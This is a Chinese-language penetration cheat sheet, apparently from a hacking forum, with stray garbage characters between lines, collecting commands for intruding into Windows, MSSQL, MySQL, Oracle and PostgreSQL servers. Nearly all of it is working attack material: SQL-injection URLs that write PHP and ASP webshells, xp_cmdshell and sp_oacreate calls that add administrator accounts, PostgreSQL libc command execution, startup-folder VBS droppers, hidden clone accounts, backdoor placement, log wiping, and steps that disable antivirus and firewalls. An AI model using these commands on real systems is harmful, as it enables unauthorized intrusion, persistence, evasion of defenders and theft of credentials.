渗透技术大全

admin

& j( L( P5 {" w0 |1 j$ U5 q1.net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 s  a9 g% S! B2.比较巧妙的建克隆号的步骤
先建一个user的用户
然后导出注册表。然后在计算机管理里删掉
在导入，在添加为管理员组
3.查radmin密码
6 ~8 k; T! n7 J& w: i0 |0 breg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
/ u! o4 M8 C" v, O6 J+ s4 R4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
建立一个"services.exe"的项
; h  {! x! p4 o( m( p再在其下面建立(字符串值)
6 i/ r1 [- H9 F+ Z键值为mu ma的全路径
5.runas /user:guest cmd
; ^7 c4 _9 o# I) G; I- \测试用户权限！
) W$ v; F" M9 O8 {6 Z* |& |& f1 v2 [% V6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
7.入侵后漏洞修补、痕迹清理，后门置放：
基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' h! B, N) i4 l& K) Q& ?8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

4 n9 R+ _" v) P5 ]6 r) yfor example
. o8 V. p' O9 f7 ]8 d& z9 A4 p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
4 }) |4 S9 W8 c3 h7 s
& z" }' q, j# J  ^1 H8 p9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
5 b, A* I/ U9 l! aid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, C9 ^9 ?- F! v! z5 T8 S1 Y0 G然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
/ \1 S& \  @5 \或者
; U0 g" G; j  u9 ^8 ?- F  ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。

分析器
3 q3 z9 R) i( ]3 ~0 Y6 N3 u" NEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
8 e% N& j' @: t  R然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10.xp_cmdshell新的恢复办法
$ e7 Z! L) v8 d+ B. txp_cmdshell新的恢复办法
/ D- e& i% e) |扩展储存过程被删除以后可以有很简单的办法恢复：
/ M6 p1 E* h: {+ n; b  I4 s/ z删除
3 A# ~) c. X! g4 I) _drop procedure sp_addextendedproc
3 I  w) x  U) t( Xdrop procedure sp_oacreate
) I. Z+ v( r8 E$ A9 x7 c: Eexec sp_dropextendedproc 'xp_cmdshell'
8 v: e* p% J1 Z( @/ {# b
2 D* O4 m& s7 M. {  [恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

5 i/ ]0 l- U+ i1 I, w* d( N这样可以直接恢复，不用去管sp_addextendedproc是不是存在

-----------------------------

3 |. f. ]  o7 R& P: P  Z" t删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
& Y" v# J: S9 C$ Q
, \& r" Y; W: N; i$ l& n恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
* [! M2 w& A) D, w  B7 c+ A( @
; }4 D. u: {1 M; _5 V- H
开启cmdshell的sql语句
# z( A. {' `5 |3 v
! x% }  S, a$ j9 n4 Q- \* sexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
5 O9 c0 A# l9 Tselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
8 [; e" a, y7 j3 Y返回结果为1就ok

恢复xp_cmdshell
+ v9 R. R- I7 G" n+ c* J' oexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, {9 T5 _; u- B/ H/ K% A4 A  v返回结果为1就ok
- s: Y/ k, J# k1 L1 L5 ?
" V/ u" Q6 w) o$ }否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

# f+ q7 Y$ ]: n5 P: }堵上cmdshell的sql语句
+ O2 \4 u, }9 gsp_dropextendedproc "xp_cmdshel
) N9 G0 w0 N! o5 d% k+ F-------------------------
清除3389的登录记录用一条系统自带的命令：
3 f* U5 c' T! |7 F7 B# q$ Rreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
+ m. M3 n6 a3 k' T( x7 n: n
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
  i9 B5 a% ?; g8 }# F  q在 mysql里查看当前用户的权限
show grants for  

以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
8 y+ b6 E0 Y" p$ w# v6 n
( O& `/ |9 W. h& I: e6 M
Create USER 'itpro'@'%' IDENTIFIED BY '123';
. v  q" Z  U+ l
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
8 }$ ~( n6 [* l; K  U! E
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 s+ B- f( s2 n) I% r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

搞完事记得删除脚印哟。

Drop USER 'itpro'@'%';
& o$ s/ v. p% Q+ M5 S% t1 P+ m2 E3 E
1 d2 d. Y  n, ~( w% y7 W$ L& [Drop DATABASE IF EXISTS `itpro` ;
, j% L. f8 U) @- ?- L) N$ G4 A3 ?
3 C* L' n; D7 {+ @* B当前用户获取system权限
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
程序代码
<SCRIPT LANGUAGE="VBScript">
& ?! ~& e) `% Z/ ?% @* D5 R( tset wsnetwork=CreateObject("WSCRIPT.NETWORK")
; \) c' A5 f' t4 I' W5 @os="WinNT://"&wsnetwork.ComputerName
$ S/ e0 r. u/ B* s& _Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
( [6 ~' r3 F4 }2 C6 e' uod.SetPassword "123456abc!@#"
: _& h+ C/ S. M1 y( Uod.SetInfo
+ b- t1 n; f9 YSet of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
2 u# {" t  @9 v+ w3 Y+ o5 \<script language=javascript>window.close();</script>


: T4 M( D: K8 I6 K2 d

突破验证码限制入后台拿shell
程序代码
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
# F: p6 X$ q& w1 v, @
  r6 A( V. h% B9 _' ~保存为code.reg，导入注册表，重器IE
3 p2 a* V' C) A5 J% f! ~就可以了
1 a. i2 }6 m  V' k+ _7 F  `union写马
# x* t7 Q% p' f% `& |" Y6 k9 T9 \程序代码
; \9 P$ m4 j4 Q3 n( n9 b6 Ewww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) d; q5 N* |+ Y' q4 F0 p
* T% l- [; c; }5 @, ]  o- f应用在dedecms注射漏洞上,无后台写马
dedecms后台，无文件管理器，没有outfile权限的时候
' t: M( x: {) p% G% |# H) P2 `在插件管理-病毒扫描里
写一句话进include/config_hand.php里
程序代码
>';?><?php @eval($_POST[cmd]);?>

" P; [1 X0 A% P/ w- z$ H/ k+ ^
6 R& |  q9 w+ w7 H如上格式

- \3 n' q) S( Boracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码
select username,password from dba_users;

$ n) v$ s8 ]* L. N9 Q6 ]
mysql远程连接用户
% R+ K( d" |+ _7 s0 j( b+ E9 y程序代码
% ^9 ^3 X& r' F
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
  C  x: g" p8 t. @: M
$ ]( |9 A$ \# S3 K" W
/ I+ C3 r# H( d; m* A3 N

- R7 x3 G! Y% r- W4 J; m0 C/ i, B5 m4 uecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 Y1 M, g9 m* |
1.查询终端端口

xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
: g+ Y) d. S. ~# @, v3 k& V
) T+ u; Q; J3 O4 r- s# v6 D通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
! n$ Z5 Q- q3 u8 ], Ptype tsp.reg

  r8 v0 k5 O; _2.开启XP&2003终端服务
; o- v* l; n4 L# m# u
; g7 d! M$ X4 _1 Q# w
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为20008(0x4E28)

' O! Y" N$ l2 R, b7 Z' QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
" X$ L6 |5 }" r; }# f# j( N* k
' A+ T4 T" f( w. m0 FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ m- i( f0 N  w, K' k  W) Y1 d( \
! D' G( e) _# @6 B9 e) _( l9 }4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
7 f% o' ^+ e* B( i
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

$ |5 i. A1 L- w8 [' Y  O1 \
5.开启Win2000的终端，端口为3389(需重启)
* V8 {) Q; s5 P2 I4 C9 C$ {, i
, S& t# x2 C% P* `9 ~echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
+ J8 [& P2 B; x% o) |3 w9 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
) ]9 o- P1 e( A: S/ a( V9 @) m+ mecho "Enabled"="0" >>2000.reg
9 }- r8 K+ b, h* z3 Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
; `# ^/ _' M- Z, w3 s( `; Mecho "ShutdownWithoutLogon"="0" >>2000.reg
; t; C$ l% Z! \: k' z# Cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
$ |& o; p! `' }6 l# iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
2 C' Q7 f9 D( y8 Cecho "Start"=dword:00000002 >>2000.reg
! Y! l: X; S7 Qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
3 b0 Z- ]+ b2 a/ T) w: p/ ~$ o% Cecho "Hotkey"="1" >>2000.reg
: A6 M" }1 Q0 T+ Y6 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg

1 _9 W2 m! x8 W$ M8 n: M6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

& t) g& h6 p( Y# U@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
; G! |' k! G% A+ K! decho [defaultinstall] >> restart.inf
" Q, M& ]9 z+ E2 _& orundll32 setupapi,%inf% 1 %temp%\restart.inf
. {  W9 t' c* e2 j8 {- J* Q1 ], I
4 ^3 Y& V. n' K4 p' J  y
+ G  D9 k1 C3 Y) ^1 x2 I0 x" E2 C7.禁用TCP/IP端口筛选 (需重启)

2 J4 B/ F/ u2 ^' M7 W  ZREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
2 B- V( H8 f6 a) ?) Q2 X; Z1 B; Z
8.终端超出最大连接数时可用下面的命令来连接
8 M' R& t2 B+ D/ A5 C
! c/ O3 m$ \: r% vmstsc /v:ip:3389 /console
) E9 p* f5 I2 `/ Z& l& e8 ?$ q
1 ~$ z; D/ n# T8 C! ?9 I+ p9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)

cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
# x- K+ u8 a  Y1 P. e5 ?0 ?
; d& W' v5 V+ F* P" r0 q0 R$ n. I------------------------------------------------------
3389.vbs
: p/ C( u1 A/ u/ x, n- {$ @2 [0 QOn Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
+ Z& d/ T  Q2 ?- G- G/ ^strComputer = "."
  e# y' _/ T- p7 XSet StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
/ W  @: }) j5 j) n: A: \0 e6 YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
1 E9 j' q/ g; V4 V0 E7 y% r6 WstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 @; c: r; o: M9 Zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
) @2 D8 \1 e( B6 y$ HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
9 k* [8 k# b7 Y5 d$ rdwValue = 0
5 ?7 |  p3 p' roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, c/ w0 D6 O. ^4 y" |+ A+ K0 ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "ortNumber"
: O- [, u4 a' u% t7 n+ w% b1 GdwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# N& I+ j5 z, H8 |0 w$ V. V& A' VstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 b5 o9 ]6 V. K3 O9 W# v7 tstrValueName = "ortNumber"
. t9 I9 L& t2 v, T/ X1 S- Y( a$ AdwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
+ @) n/ S% a( ^! J$ `4 J4 rSet R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
! i& ]! D* Z. j( f9 y
; X+ H8 S+ N, l- }; }删除awgina.dll的注册表键值
程序代码
# t8 r6 ^6 }+ B- c
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

( c! T; s) ]; q! }- N  i8 w7 ^

$ n6 m7 ^) X4 b$ k, u
程序代码
" ]" _0 F' d! a! z2 M1 h9 L0 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

设置为1，关闭LM Hash

, f7 {; T( @( ~5 ^7 w& E3 l8 }6 a数据库安全:入侵Oracle数据库常用操作命令
最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
3 h( h& ~; B8 L, c. o) ]1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
/ F7 R, }" |/ Z2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3、SQL>connect / as sysdba ;（as sysoper）或
3 |0 j# q* |. yconnect internal/oracle AS SYSDBA ;(scott/tiger)
  E# ]; {( |6 iconn sys/change_on_install as sysdba;
, m  B' ]* S# t9 y+ h, a: \4、SQL>startup; 启动数据库实例
5、查看当前的所有数据库: select * from v$database;
! c) B6 }. Q2 T; e$ v* \5 R0 \select name from v$database;
6、desc v$databases; 查看数据库结构字段
: J% b3 s- v! `; m) v% t5 F) n! k- y0 ]" a7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
SQL>select * from V_$PWFILE_USERS;
Show user;查看当前数据库连接用户
8、进入test数据库：database test;
. ~0 v7 Z. X5 s/ @1 F9、查看所有的数据库实例：select * from v$instance；
如：ora9i
10、查看当前库的所有数据表：
) O0 t1 K' x6 ~5 V- s8 I& GSQL> select TABLE_NAME from all_tables;
3 q6 {# l4 T2 M- d' M3 i- g  H; Mselect * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
  n9 Q' V+ K( m# }! f11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
desc CQI.T_BBS_XUSER;
13、获得CQI.T_BBS_XUSER表中的记录：
select * from CQI.T_BBS_XUSER;
14、增加数据库用户：(test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15、用户授权:
grant connect,resource,dba to test11;
1 C* H5 ]8 f+ H2 n% ]grant sysdba to test11;
/ g5 T* s  r* Q3 T8 tcommit;
16、更改数据库用户的密码：(将sys与system的密码改为test.)
: E7 S0 R% b/ K% talter user sys indentified by test;
alter user system indentified by test;
4 H2 `$ A% ?; V
" j' d4 I: ^. g$ J) H! TapplicationContext-util.xml
! ?! j( _7 i" `  H5 _; yapplicationContext.xml
; x2 ~9 [* w2 k$ _( W1 ?, t. sstruts-config.xml
web.xml
; U* C* j: r( q. p2 m* Y$ Dserver.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml
' y. C8 d; u# v- V& N7 v+ l3 }- Y# B; c; y

- j; d; V& [. P# r\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
6 Z0 d, b9 e" j1 W\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
0 S1 n# Z7 V$ n3 p\WEB-INF\struts-config.xml  文件目录结构
9 d& N4 Z$ ~8 c. k6 Z: \# m
, z9 y* W5 A( w. M% uspring.properties 里边包含hibernate.cfg.xml的名称


C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

+ ~% T% u* B+ u- Y7 \3 M如果都找不到  那就看看class文件吧。。

测试1：
1 B. }' h  `4 H$ O3 OSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% P! ]7 w1 V5 u* [6 W* e  h
, [' S# p- B7 E' J8 }" k1 _9 p测试2：

% q, C1 m- i* p+ F( Kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' Y. k+ p: l* N; M: ?
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

查看虚拟机中的共享文件：
在虚拟机中的cmd中执行
& E2 j; f4 e4 U4 k3 m& F7 ^- l4 Z. I\\.host\Shared Folders
4 u: O9 w* Q9 ~# A; m" S
cmdshell下找终端的技巧
找终端：
( I. X. m" o. A. h. [% _: \: B第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
; U7 L$ `8 r2 r6 i　　 而终端所对应的服务名为：TermService
第二步：用netstat -ano命令，列出所有端口对应的PID值!
　　 找到PID值所对应的端口

查询sql server 2005中的密码hash
3 d+ S6 ]. C  H/ USELECT password_hash FROM sys.sql_logins where name='sa'
! t/ `2 v" e+ w( zSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 K1 `" z; W9 S3 }0 S; ?access中导出shell

中文版本操作系统中针对mysql添加用户完整代码：

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
: R  w0 L) ]* `6 B) O/ r1 Ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
* N9 @9 @# F: E, _9 l4 P( |+ `select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

英文版本：
  ~+ H- @- J+ y4 K7 p& y$ }
. Z- `% f) @6 wuse test;
7 [* h5 X% ]. N0 C. {6 @3 ncreate table a (cmd text);
6 l0 u( F1 R, t+ _, S" Y2 o7 ginsert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

9 W) a3 l7 k) h0 screate table a (cmd BLOB);
insert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
drop table a;

记录一下怎么处理变态诺顿
( e7 Z& Z% v: U% c  G, u查看诺顿服务的路径
sc qc ccSetMgr
然后设置权限拒绝访问。做绝一点。。
7 L8 V. T; }/ T& J! ]5 E! Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
4 }! A% h6 M7 A# V: bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
: g7 [9 C8 Z0 t/ d5 d8 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
$ R- D7 ?5 R6 e7 c2 x
/ u3 G' c; [4 g& q然后再重启服务器
iisreset /reboot
这样就搞定了。。不过完事后。记得恢复权限。。。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
. p' w' }$ g- P! o2 h  U+ j! d/ Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ q2 Y8 H" S7 u0 ^5 l/ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

postgresql注射的一些东西
/ @; J# n" M7 _. ~* x# d4 u1 K! t. P如何获得webshell
7 Y3 O) Q+ Q1 g& D* o. e9 Thttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
4 \6 Z2 C) |' l# q% vhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! \0 M  z- O( L, x! P' b& N7 ~如何读文件
9 j1 Q! l) b3 xhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
7 k/ L! m3 p% `+ A. P3 zhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

z执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
; D" I. X# f7 T1 g) @( \# N2 b当然，这些的postgresql的数据库版本必须大于8.X
创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

# m, f  Z: o4 F. c7 b  g/ C创建一个输出表：
7 N; m" c8 J; |7 r2 f  Q2 xCREATE TABLE stdout(id serial, system_out text)

+ D2 x0 i+ x% A8 g执行shell，输出到输出表内：
! O3 C4 N7 b# s! C% oSELECT system('uname -a > /tmp/test')
' |! m. D- A  n1 _+ b5 |' G: C& u4 e4 ]
copy 输出的内容到表里面；
$ w' q+ ]* |) ?% UCOPY stdout(system_out) FROM '/tmp/test'

& _9 P: ^, x1 p6 P/ R$ Y7 r从输出表内读取执行后的回显，判断是否执行成功

SELECT system_out FROM stdout
下面是测试例子
) d  z) C+ s6 i
( i3 V* t: r( o$ z: T% K/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

# o/ C: Z8 S. I" I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --
$ W. J' S7 O+ p2 p) N% T! t
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
: J! u/ l8 z5 H" O2 i  W8 I0 a/ z3 R
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

+ C! j/ ~1 {  W2 L/ B9 I2 K/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 ], H( T3 I0 z9 }+ u+ A$ nnet stop sharedaccess    stop the default firewall
3 N6 J1 V/ Z# A; |% ynetsh firewall show      show/config default firewall
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
! `. w4 m: Q: ~! y* S, s# ^netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
修改3389端口方法（修改后不易被扫出）
2 r9 U7 @$ W7 }% p% l- U5 f修改服务器端的端口设置,注册表有2个地方需要修改

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如6000
, @( f) h, t2 E) g/ f: Y2 ?9 Y
" s9 h/ `* E9 P5 D0 s第二个地方：
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如6000

- d- h3 D# c- {# Z2 _9 [8 c3 n3 t现在这样就可以了。重启系统就可以了

查看3389远程登录的脚本
" s3 j0 N* x2 M1 l3 ~保存为一个bat文件
! |% X6 |/ A9 S+ {; ?date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
  f; o' j; H; ^( Fstart Explorer
/ T8 ~9 B' H( n9 f  _* j; _
mstsc的参数：

远程桌面连接
; c% ~3 f" o! ]7 Z2 o# O
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

